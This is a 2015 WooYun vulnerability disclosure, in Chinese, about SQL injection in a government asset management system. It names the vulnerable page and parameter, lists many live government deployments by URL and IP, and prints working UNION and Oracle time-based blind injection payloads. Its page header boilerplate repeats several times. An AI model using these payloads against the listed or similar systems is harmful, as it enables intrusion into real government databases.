某政府在用资产管理系统通用SQL注入漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111362

漏洞标题：某政府在用资产管理系统通用SQL注入漏洞

漏洞作者：路人甲

提交时间：2015-05-05 10:49

修复时间：2015-08-06 18:44

公开时间：2015-08-06 18:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-05：细节已通知厂商并且等待厂商处理中
2015-05-08：厂商已经确认，细节仅向厂商公开
2015-05-11：细节向第三方安全合作伙伴开放
2015-07-02：细节向核心白帽子及相关领域专家公开
2015-07-12：细节向普通白帽子公开
2015-07-22：细节向实习白帽子公开
2015-08-06：细节向公众公开

简要描述：

某政府在用资产管理系统通用SQL注入漏洞

详细说明：

某政务资产管理系统任意文件上传Getshell
系统开发厂商：济南国子数码科技有限公司
系统架构：ASPX+oracle
漏洞问题：SQL注入漏洞
关键字：版权所有: 界首市财政局　济南国子数码科技有限公司
漏洞文件：Manger\modifyMessage.aspx
注入参数ID
找了下，全部都是政府单位，列举部分如下：
界首县行政事业资产管理信息系统：http://60.172.2.211:8081/
阜阳市行政事业资产管理信息系统：http://www.fyzcgl.com/
颍州区行政事业资产管理信息系统：http://218.22.115.165:8011/
颍泉区行政事业资产管理信息系统：http://www.fyyqqgz.com/
颍上县行政事业资产管理信息系统：http://zcgl.yscz.gov.cn:8001/
太和县行政事业资产管理信息系统：http://220.180.150.228/
临泉县行政事业资产管理信息系统：http://www.lqzcgl.com/
颍东区行政事业资产管理信息系统：http://218.22.114.166:8011/
阜阳市经济技术开发区资产管理信息系统：http://www.fyzcgl.com/fygx/
山东省行政事业资产管理信息系统：http://zc100.com/
阜南县行政事业资产管理信息系统：http://www.fnzcgl.com/
马鞍山行政事业资产管理信息系统：http://zc.mas.gov.cn:8080/
岳阳市行政事业资产管理信息系统：http://zc.yyxcz.gov.cn:81/
等等

漏洞证明：

漏洞验证：
这里以http://60.172.2.211:8081/Manger%5CmodifyMessage.aspx?ID=1为例

Place: GET
Parameter: ID
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: ID=11 UNION ALL SELECT NULL,CHR(58)||CHR(102)||CHR(104)||CHR(112)||
CHR(58)||CHR(87)||CHR(78)||CHR(121)||CHR(122)||CHR(65)||CHR(105)||CHR(77)||CHR(7
1)||CHR(79)||CHR(110)||CHR(58)||CHR(120)||CHR(114)||CHR(105)||CHR(58),NULL,NULL,
NULL FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: ID=11 AND 3670=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(99)||CHR(107
)||CHR(100),5)
---

数据库信息：

等
其他如上！

修复方案：

参数过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-05-08 18:42

厂商回复：

CNVD确认所述情况，已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111362

漏洞标题：某政府在用资产管理系统通用SQL注入漏洞

相关厂商：济南国子数码科技有限公司

漏洞作者：路人甲

提交时间：2015-05-05 10:49

修复时间：2015-08-06 18:44

公开时间：2015-08-06 18:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111362

漏洞标题：某政府在用资产管理系统通用SQL注入漏洞

相关厂商：济南国子数码科技有限公司

漏洞作者： 路人甲

提交时间：2015-05-05 10:49

修复时间：2015-08-06 18:44

公开时间：2015-08-06 18:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0111362"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云